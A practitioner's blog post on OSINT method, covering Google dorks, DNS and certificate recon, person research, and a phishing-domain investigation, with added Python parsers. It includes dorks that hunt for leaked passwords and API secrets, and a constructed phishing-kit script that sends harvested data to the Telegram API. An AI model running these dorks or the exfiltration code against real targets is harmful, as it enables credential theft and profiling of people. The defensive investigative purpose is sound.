6 min read · INFO · @Sdmrf

How I Actually Do OSINT Investigations

A realistic look at open source intelligence gathering - the tools I use, the process I follow, and why most OSINT tutorials are overly complicated.


OSINT tutorials love to throw 47 tools at you and claim you need all of them. You don’t.

Here’s how I actually approach open source intelligence gathering, stripped of the tool-hoarding and complexity that makes most guides useless.

My Actual Toolkit

The tools I use 90% of the time:

  1. A web browser (Firefox with containers)
  2. Google (with operators)
  3. A notes app (Obsidian)
  4. A few specific lookup sites

That’s it. Seriously.

Yes, there are dozens of specialized tools. Most of the time, you don’t need them. Learn the fundamentals first.

The Process

Step 1: Define What You’re Looking For

This sounds obvious but gets skipped constantly. Before touching any tool, answer:

  • What specific information do I need?
  • What do I already know?
  • What’s my stopping point?

Undirected OSINT is a time sink. “Learn everything about this person/company/domain” leads to hours of rabbit holes with nothing useful.

Good: “Find the email addresses associated with this domain”
Bad: “Investigate this domain”

Step 2: Start With Google (Really)

Google dorking isn’t fancy, but it works:

site:linkedin.com "company name" "job title"
site:github.com "company.com" password OR secret OR api
"target name" filetype:pdf
inurl:admin site:target.com

My most-used operators:

Operator         Purpose
site:            Restrict to specific domain
filetype:        Find specific file types
inurl:           Term must be in URL
intitle:         Term must be in title
"exact phrase"   Exact match
-exclude         Remove results with term

Combine them:

site:target.com filetype:pdf -public
site:pastebin.com "target.com" password

90% of my OSINT starts and often ends with Google searches.

Step 3: Domain/Infrastructure Recon

When investigating infrastructure, my flow:

DNS records:

# What's pointing where. ANY queries are often refused or answered with a
# minimal response (RFC 8482), so ask for each record type explicitly.
dig +short target.com A
dig +short target.com NS
dig target.com MX
dig target.com TXT
dig www.target.com CNAME

Historical data:

  • Wayback Machine (web.archive.org) - How did the site look before?
  • SecurityTrails - Historical DNS records
  • crt.sh - Certificate transparency logs
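The crt.sh lookup above is where most of the subdomain leads come from, so here is what the parsing step looks like in practice. This is an added example, not code from the original post: it runs over a constructed stand-in for the JSON that `https://crt.sh/?q=%25.target.com&output=json` returns (`target.com` is a placeholder domain), splits multi-SAN entries, collapses wildcards, rejects lookalike names that merely contain the domain, and groups the survivors by the environment tokens in their labels.

```python
import json
import re
from typing import Iterable

# Constructed stand-in for a crt.sh JSON response. Real responses carry more
# fields; only the ones used here are included. target.com is a placeholder.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.target.com\ntarget.com",
     "not_before": "2024-01-10T00:00:00"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "*.target.com",
     "not_before": "2023-06-01T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "vpn-corp.target.com\njenkins-prod.target.com",
     "not_before": "2024-03-02T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "staging-api.target.com",
     "not_before": "2022-11-20T00:00:00"},
    # A lookalike that naive substring matching would accept; the suffix
    # check below rejects it.
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "login.target.com.evil.example",
     "not_before": "2024-04-01T00:00:00"},
])

HOSTNAME_RE = re.compile(
    r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$"
)


def subdomains_from_crtsh(raw_json: str, domain: str) -> list[str]:
    """Return the unique, in-scope hostnames seen in a crt.sh JSON response.

    - name_value may hold several SANs separated by newlines.
    - Wildcard entries ("*.target.com") collapse to the base domain; they only
      prove a wildcard cert exists, not which hosts sit behind it.
    - Names are kept only if they equal the domain or end in ".domain", which
      rejects lookalikes such as target.com.evil.example.
    """
    domain = domain.lower().rstrip(".")
    found: set[str] = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]
            if not HOSTNAME_RE.match(name):
                continue
            if name == domain or name.endswith("." + domain):
                found.add(name)
    return sorted(found)


def naming_hints(hosts: Iterable[str], domain: str) -> dict[str, list[str]]:
    """Group hostnames by environment/role tokens found in their labels.

    These are the 'internal naming convention' clues the post talks about.
    The token list is a hand-picked starting point, not an exhaustive one.
    """
    tokens = ("prod", "staging", "dev", "test", "corp", "vpn", "api", "jenkins", "git")
    groups: dict[str, list[str]] = {}
    for host in hosts:
        label = host[: -len(domain) - 1] if host != domain else ""
        parts = set(label.replace(".", "-").split("-"))
        for tok in tokens:
            if tok in parts:
                groups.setdefault(tok, []).append(host)
    return groups


if __name__ == "__main__":
    hosts = subdomains_from_crtsh(SAMPLE_CRTSH_JSON, "target.com")
    print("\n".join(hosts))
    for tok, members in sorted(naming_hints(hosts, "target.com").items()):
        print(f"{tok}: {', '.join(members)}")
```

To use it against live data, fetch the crt.sh URL above and pass the response body to `subdomains_from_crtsh`; the suffix check matters because a `%.target.com` query is exact, but copy-pasted SAN lists from other sources are not.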

What I’m looking for:

  • Subdomains that reveal internal naming conventions
  • Old content that was removed
  • Email infrastructure hints (MX records)
  • Cloud providers in use (often visible in CNAMEs)
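The MX, TXT and CNAME answers are where the email and cloud provider hints live, and reading them by eye gets old quickly. The following is an added example, not the author's own tooling: it parses constructed `dig +noall +answer` style output for the placeholder `target.com`, maps MX targets, SPF `include:` hosts and CNAME targets to providers by longest matching suffix, and reports anything it cannot attribute as unknown rather than guessing.

```python
import re
from typing import Optional

# Constructed sample of `dig +noall +answer` output for MX, TXT and CNAME
# lookups. The right-hand hostnames are real provider domains; target.com
# and the specific CNAME labels are placeholders.
SAMPLE_DIG_OUTPUT = """\
target.com.          300  IN  MX   1 aspmx.l.google.com.
target.com.          300  IN  MX   5 alt1.aspmx.l.google.com.
target.com.          300  IN  TXT  "v=spf1 include:_spf.google.com include:sendgrid.net -all"
target.com.          300  IN  TXT  "MS=ms12345678"
www.target.com.      300  IN  CNAME d111111abcdef8.cloudfront.net.
app.target.com.      300  IN  CNAME myapp-prod.azurewebsites.net.
status.target.com.   300  IN  CNAME statuspage.io.
"""

# Suffix fingerprints for MX/CNAME/SPF targets. A starting list, not a
# complete one; extend it as you meet new providers.
PROVIDER_SUFFIXES = {
    "google.com": "Google Workspace / Google Cloud",
    "googlemail.com": "Google Workspace",
    "outlook.com": "Microsoft 365",
    "protection.outlook.com": "Microsoft 365 (Exchange Online Protection)",
    "pphosted.com": "Proofpoint",
    "mimecast.com": "Mimecast",
    "sendgrid.net": "SendGrid",
    "cloudfront.net": "AWS CloudFront",
    "amazonaws.com": "AWS",
    "azurewebsites.net": "Azure App Service",
    "azureedge.net": "Azure CDN",
    "herokuapp.com": "Heroku",
    "github.io": "GitHub Pages",
}

RECORD_RE = re.compile(r"^(?P<name>\S+)\s+\d+\s+IN\s+(?P<type>[A-Z]+)\s+(?P<data>.+)$")


def provider_for(host: str) -> Optional[str]:
    """Map a hostname to a provider by the longest matching suffix, or None."""
    host = host.lower().rstrip(".")
    best: Optional[tuple[str, str]] = None
    for suffix, provider in PROVIDER_SUFFIXES.items():
        if host == suffix or host.endswith("." + suffix):
            if best is None or len(suffix) > len(best[0]):
                best = (suffix, provider)
    return best[1] if best else None


def infer_infrastructure(dig_output: str) -> dict[str, dict[str, str]]:
    """Turn dig answer lines into {category: {indicator: provider}}.

    MX targets -> inbound mail provider; SPF include: hosts -> who is allowed
    to send mail as the domain; CNAME targets -> hosting/CDN per subdomain.
    """
    result: dict[str, dict[str, str]] = {"mail": {}, "spf_senders": {}, "cname_hosting": {}}
    for line in dig_output.splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            continue
        name, rtype, data = m.group("name"), m.group("type"), m.group("data")
        if rtype == "MX":
            target = data.split()[-1]
            result["mail"][target.rstrip(".")] = provider_for(target) or "unknown"
        elif rtype == "TXT" and "v=spf1" in data:
            for inc in re.findall(r"include:(\S+)", data.strip('"')):
                result["spf_senders"][inc] = provider_for(inc) or "unknown"
        elif rtype == "CNAME":
            result["cname_hosting"][name.rstrip(".")] = (
                f"{data.rstrip('.')} ({provider_for(data) or 'unknown'})"
            )
    return result


if __name__ == "__main__":
    for category, items in infer_infrastructure(SAMPLE_DIG_OUTPUT).items():
        print(category)
        for indicator, provider in items.items():
            print(f"  {indicator}: {provider}")
```

Feed it the concatenated output of `dig +noall +answer target.com MX`, `... TXT` and `dig +noall +answer <sub>.target.com CNAME` for each subdomain you found; the SPF includes are often the more interesting half, because they name third-party senders (marketing, ticketing, CRM) that never appear in MX.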

Step 4: Person Research

For researching individuals (with appropriate authorization):

LinkedIn:

  • Current/past employers
  • Connections (often reveals colleagues)
  • Activity (comments, posts reveal interests)
  • Education

Pro tip: Don’t be logged into LinkedIn while researching. Use a browser container or incognito.

Username search: I check common platforms manually. Yes, there are tools that automate this, but they’re often blocked or return false positives. Manual checks:

  • GitHub
  • Twitter/X
  • Reddit
  • HackerNews
  • Stack Overflow
  • Personal blogs (Google: “[name]” blog OR personal)

Email discovery:

  • Hunter.io (limited free searches)
  • RocketReach (same)
  • Google: "[name]" email OR contact site:target.com
  • Check conference talks, PDF author metadata

Step 5: Document Everything

This is where most people fail. You’ll find information, not document it, then forget where you found it.

My notes template:

# Investigation: [Target]
Date: [Date]
Objective: [What am I trying to find]

## Known Information
- [Starting facts]

## Findings
### [Category]
- Finding: [What]
- Source: [URL with archive link]
- Date found: [When]
- Confidence: [High/Medium/Low]

## Questions/Gaps
- [What I still don't know]

## Next Steps
- [Actions to take]

Always archive URLs. Sites disappear. Use archive.today or Wayback Machine to preserve what you find.

What I Don’t Do

Bulk automated scanning

Unless I have explicit permission, I don’t run automated scanners against targets. OSINT means passive collection from public sources, not active probing.

Paying for expensive platforms

For individual research, free tiers and open sources cover 95% of needs. The expensive tools are for teams doing this at scale.

Using sketchy tools

Random OSINT tools from GitHub might work, but they might also leak your queries or be abandoned. Stick to established tools or build your own simple scripts.

Real Example: Investigating a Phishing Domain

Let me walk through a recent investigation (details sanitized):

Objective: Determine who’s behind a phishing domain targeting our company.

Step 1: Domain basics

whois phishing-domain.com
# Registration: Recent (red flag), privacy protected (expected)

dig phishing-domain.com
# Pointed to Cloudflare (hiding real IP)

Step 2: Historical

SecurityTrails showed the domain briefly pointed to a non-Cloudflare IP before being proxied. Got the real host IP.

Step 3: Pivot on IP

# What else is hosted there?
# Shodan, Censys for this

Found 3 other domains on the same IP, all recently registered, all mimicking financial institutions.

Step 4: Infrastructure pattern

All domains used:

  • Same registrar
  • Same hosting
  • Same SSL certificate pattern
  • Same phishing kit (identified by page structure)

Step 5: Phishing kit analysis

Downloaded the phishing page source. Found:

  • Telegram bot token in the JavaScript (exfiltration channel)
  • Russian language comments in the code
  • Unique string that turned up on a Telegram channel discussing “logs”

Outcome: Identified a likely threat actor handle, documented IOCs for blocking, reported to relevant parties.

Total time: ~2 hours. Tools used: Browser, dig, SecurityTrails (free tier), Shodan (free tier).
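The kit analysis in Step 5 of the walkthrough is the part that is easy to automate once you have the page source. Below is an added example, not the author's script and not taken from any real kit: it runs over a constructed snippet of phishing-kit JavaScript with a made-up bot token and chat id in the correct Telegram formats, pulls out the token, the supergroup chat id, the `api.telegram.org` exfiltration endpoint and the post-submit redirect, flags comments written in Cyrillic, and defangs the URLs for an IOC list.

```python
import re
import unicodedata

# Constructed stand-in for a phishing kit's client-side script. The token and
# chat id are fabricated values in the right shape, not real credentials.
SAMPLE_KIT_JS = r"""
// Отправка данных в телегу
const TOKEN = "123456789:AAEFghijklmnopqrstuvwxyz0123456789_";
const CHAT_ID = "-1001234567890";
async function send(data) {
  // логи
  await fetch("https://api.telegram.org/bot" + TOKEN + "/sendMessage", {
    method: "POST",
    body: JSON.stringify({chat_id: CHAT_ID, text: "[LOG] " + data})
  });
  window.location = "https://bank.example/login";
}
"""

# Telegram bot tokens are "<numeric bot id>:<35 chars of [A-Za-z0-9_-]>".
TOKEN_RE = re.compile(r"(?<![A-Za-z0-9_])(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# Supergroup/channel chat ids are -100 followed by ten digits.
CHAT_ID_RE = re.compile(r"(?<!\d)-100\d{10}(?!\d)")
URL_RE = re.compile(r"https?://[^\s\"'`+)]+")
# Line and block comments; the lookbehind keeps "https://" out of the match.
COMMENT_RE = re.compile(r"(?<!:)//[^\n]*|/\*.*?\*/", re.S)


def has_cyrillic(text: str) -> bool:
    return any("CYRILLIC" in unicodedata.name(c, "") for c in text)


def defang(url: str) -> str:
    """Make a URL safe to paste into a report or ticket."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def analyse_kit(source: str) -> dict:
    tokens = sorted(set(TOKEN_RE.findall(source)))
    chat_ids = sorted(set(CHAT_ID_RE.findall(source)))
    urls = sorted(set(URL_RE.findall(source)))
    comments = [c.strip() for c in COMMENT_RE.findall(source)]
    return {
        "telegram_bot_tokens": tokens,
        "bot_ids": [t.split(":")[0] for t in tokens],
        "telegram_chat_ids": chat_ids,
        "exfil_endpoints": [u for u in urls if "api.telegram.org" in u],
        "other_urls": [u for u in urls if "api.telegram.org" not in u],
        "cyrillic_comments": [c for c in comments if has_cyrillic(c)],
    }


def ioc_lines(report: dict) -> list[str]:
    """Defanged, one-per-line indicators for the blocking/reporting step."""
    lines = [f"telegram_bot_id: {b}" for b in report["bot_ids"]]
    lines += [f"telegram_chat_id: {c}" for c in report["telegram_chat_ids"]]
    lines += [f"url: {defang(u)}" for u in report["exfil_endpoints"] + report["other_urls"]]
    return lines


if __name__ == "__main__":
    report = analyse_kit(SAMPLE_KIT_JS)
    for key, value in report.items():
        print(f"{key}: {value}")
    print("\n".join(ioc_lines(report)))
```

Record the bot id and chat id as pivots (the bot id is the part before the colon and is safe to share; the full token is a credential, so keep it in the evidence file, not the IOC list) and resist the temptation to call the Bot API with the token yourself: that is interaction with attacker infrastructure, not passive collection.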

When You Need More

Sometimes you do need specialized tools:

For malware analysis infrastructure:

  • URLhaus, MalwareBazaar
  • VirusTotal (passive DNS especially)
  • Any.Run, Joe Sandbox

For social media deep dives:

  • Social Bearing (Twitter analytics)
  • Pipl, Spokeo (paid people search)

For image analysis:

  • TinEye, Google reverse image search
  • ExifTool for metadata

For maps/geolocation:

  • Google Earth, Sentinel Hub
  • Mapillary for street-level

But reach for these when basic methods fail, not as a starting point.

Skills Matter More Than Tools

The best OSINT practitioners I know don’t have the most tools. They have:

  1. Curiosity - Asking “what else could this tell me?”
  2. Patience - Good investigations take time
  3. Organization - Documenting findings systematically
  4. Pattern recognition - Connecting disparate pieces
  5. Knowing when to stop - Not every thread needs following

Tools can be learned in hours. These skills take years.

Getting Better

How to improve:

  1. Practice on yourself - What can you find about you?
  2. CTF challenges - TraceLabs, OSINT Dojo
  3. Follow practitioners - Twitter/X OSINT community is active
  4. Read case studies - Bellingcat, OSINT Curious

The best OSINT tool is structured thinking. Everything else is just assistance.
